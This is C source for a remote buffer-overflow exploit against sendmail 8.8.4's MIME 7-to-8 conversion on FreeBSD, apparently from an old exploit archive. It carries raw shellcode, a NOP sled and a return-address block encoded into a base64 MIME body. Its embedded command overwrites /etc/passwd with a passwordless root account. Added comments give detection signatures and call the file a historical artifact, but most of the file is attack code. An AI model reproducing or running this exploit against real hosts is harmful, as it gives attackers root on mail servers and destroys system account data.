FreeBSD Sendmail 8.8.4 mime 7to8 remote exploit.
3026d76cd6cb15ace5c52d53c41a42d7e7c68d1c3c01f24851a28d0322a18da5
/*
sendmail 8.8.4, freebsd, mime 7to8, remote
I checked this only at home, on a custom-installed 8.8.4.
I have no FreeBSD with preinstalled 8.8.4 around.
change cmd[] below to shell command you want, and throw output to sendmail
*/
#include <stdlib.h>
#include <fcntl.h>
/*
 * Compile-time defaults. main() copies BUFSIZE, OFFS and ADDRS into locals
 * that argv[1], argv[2] and argv[3] can override.
 */
/* Default length, in bytes, of the filler region that main() builds. */
#define BUFSIZE 6100
/* Default signed offset that main() adds to the value returned by get_sp(). */
#define OFFS -5000
/* Not referenced anywhere in the visible code. */
#define ALIGN 0
/* Default count used for the trailing address block (main() appends addrs<<2 bytes). */
#define ADDRS 15
/*
 * Returns a hard-coded constant, not the live stack pointer: the inline
 * assembly that would have read %esp is commented out.
 *
 * NOTE(review): a fixed address like this only makes sense if the target
 * process has a predictable stack layout. That is the assumption which
 * address-space randomisation and non-executable stacks are designed to
 * break, so it is the relevant point for anyone assessing exposure.
 */
int get_sp(void) {
/* __asm__(" movl %esp,%eax"); */
return 0xefbf95e4;
}
/* up to 220 bytes */
/*
 * Shell command text that main() appends to asmcode. The string names
 * /etc/passwd, so for triage it is an indicator of intent to tamper with
 * the account database.
 */
char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'";
/*
 * Opaque machine-code bytes, deliberately not disassembled here. main()
 * overwrites the byte at index 41 at run time with a value derived from
 * strlen(cmd).
 *
 * Detection note: the last eleven bytes are printable ASCII
 * (2f 62 69 6e 2f 73 68 2e 2d 63 2e, i.e. "/bin/sh.-c."), and they appear
 * unchanged in the decoded MIME body that run() emits.
 */
char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89"
"\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46"
"\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17"
"\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b"
"\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73"
"\x68\x2e\x2d\x63\x2e";
/*
 * One-byte filler pattern (0x90) that main() repeats bufsize times.
 *
 * Detection note: three 0x90 bytes base64-encode to "kJCQ", so the body
 * produced by run() starts with long runs of that four-character group.
 * A text/plain part whose base64 body is mostly "kJCQ" is a usable
 * content signature for mail filters and IDS rules.
 */
char nop[]="\x90";
/* Standard base64 alphabet, indexed by 6-bit value in run(). */
char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
/*
 * Writes buf to stdout as a MIME message fragment: three header lines
 * followed by the base64 encoding of buf.
 *
 * buf is treated as a NUL-terminated string (its length comes from
 * strlen), so encoding stops at the first zero byte.
 *
 * What a defender sees on the wire or in a spool file: a part declared as
 * "Content-Type: text/plain" with "Content-Transfer-Encoding: base64",
 * with the body wrapped at 72 characters (54 input bytes) per line.
 */
void run(unsigned char *buf) {
unsigned int i, j, k;
printf("MIME-Version: 1.0\n");
printf("Content-Type: text/plain\n");
printf("Content-Transfer-Encoding: base64\n");
/* k = length rounded down to a multiple of 3; the remainder is handled below. */
k=strlen(buf) / 3 * 3;
for (i=0; i < k; i+=3) {
/* Pack three input bytes into one 24-bit group. */
j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2];
/* Newline before every 54-byte chunk; at i == 0 this is the blank line that ends the headers. */
if (i % 54 == 0)
printf("\n");
/* Emit the four 6-bit digits of the group, most significant first. */
printf("%c", Base64Table[(j & 0xfc0000) >> 18]);
printf("%c", Base64Table[(j & 0x03f000) >> 12]);
printf("%c", Base64Table[(j & 0x000fc0) >> 6]);
printf("%c", Base64Table[j & 0x00003f]);
}
/* Encode the 1 or 2 leftover bytes with '=' padding; nothing is emitted for 0. */
switch (strlen(buf) - k) {
case 1: printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2],
Base64Table[(buf[k] & 0x3) << 4]);
break;
case 2: printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2],
Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)],
Base64Table[(buf[k+1] & 0xf) << 2]);
break;
default:
}
printf("\n");
}
/*
 * Scratch buffer in which main() concatenates asmcode, cmd and a trailing
 * ".". Both sizeof terms count a terminating NUL, which leaves room for
 * that one extra character plus the final terminator.
 */
char code[sizeof(asmcode) + sizeof(cmd)];
/*
 * Builds one oversized string and hands it to run(), which prints it to
 * stdout as a base64 MIME body. The string has three parts, in order:
 *   1. bufsize bytes of the nop[] filler, whose last strlen(code) bytes
 *      are overwritten with code[] (asmcode + cmd + ".");
 *   2. addrs<<2 bytes that repeat the value get_sp() + offs;
 *   3. a terminating NUL.
 *
 * Optional arguments: argv[1] = bufsize, argv[2] = offs, argv[3] = addrs.
 * All three are parsed with atoi and are not validated.
 *
 * Defensive context: the file's header comment names the MIME 7-to-8
 * conversion in sendmail 8.8.4 as the target. Hosts still running that
 * release should move to a sendmail release in which that conversion
 * code has been fixed. The decoded body layout above (long 0x90 run, the
 * ASCII "/bin/sh.-c." marker, then a repeated 4-byte value) is what
 * content inspection would match on.
 *
 * NOTE(review): treat this listing as a historical artifact for analysis;
 * it is not presented as code that builds or runs as-is.
 */
main(int argc, char *argv[]) {
char *buf, *ptr, addr[8];
int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS;
int i, noplen=strlen(nop);
/* Command-line overrides for the three tunables. */
if (argc >1) bufsize=atoi(argv[1]);
if (argc >2) offs=atoi(argv[2]);
if (argc >3) addrs=atoi(argv[3]);
/* Assemble code[] from the machine-code bytes, the command text and a trailing ".". */
strcpy(code, asmcode);
strncat(code, cmd);
strncat(code, ".");
/* Patch one byte of the copied machine code with a value that depends on the command length. */
code[41]=0x1a+strlen(cmd)+1;
/* Refuse to continue when the filler region could not hold code[]. */
if (bufsize<strlen(code)) {
printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
exit(1);
}
if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) {
printf("Can't malloc\n");
exit(1);
}
/* Store get_sp() + offs in addr through an int pointer; only the first sizeof(int) bytes are read back. */
*(int *)addr=get_sp()+offs;
printf("address - %p\n", *(int *)addr);
ptr=buf;
/* Part 1: fill bufsize bytes with the nop[] pattern. */
for (i=0; i<bufsize; i++)
*ptr++=nop[i % noplen];
/* Overwrite the tail of the filler with code[], so it sits just before the address block. */
memcpy(ptr-strlen(code), code, strlen(code));
/* Part 2: append addrs<<2 bytes that cycle through the bytes of the stored address. */
for (i=0; i<addrs<<2; i++)
*ptr++=addr[i % sizeof(int)];
/* Part 3: terminate, because run() measures the buffer with strlen. */
*ptr=0;
printf("total buf len - %d\n", strlen(buf));
run(buf);
}
/* www.hack.co.za */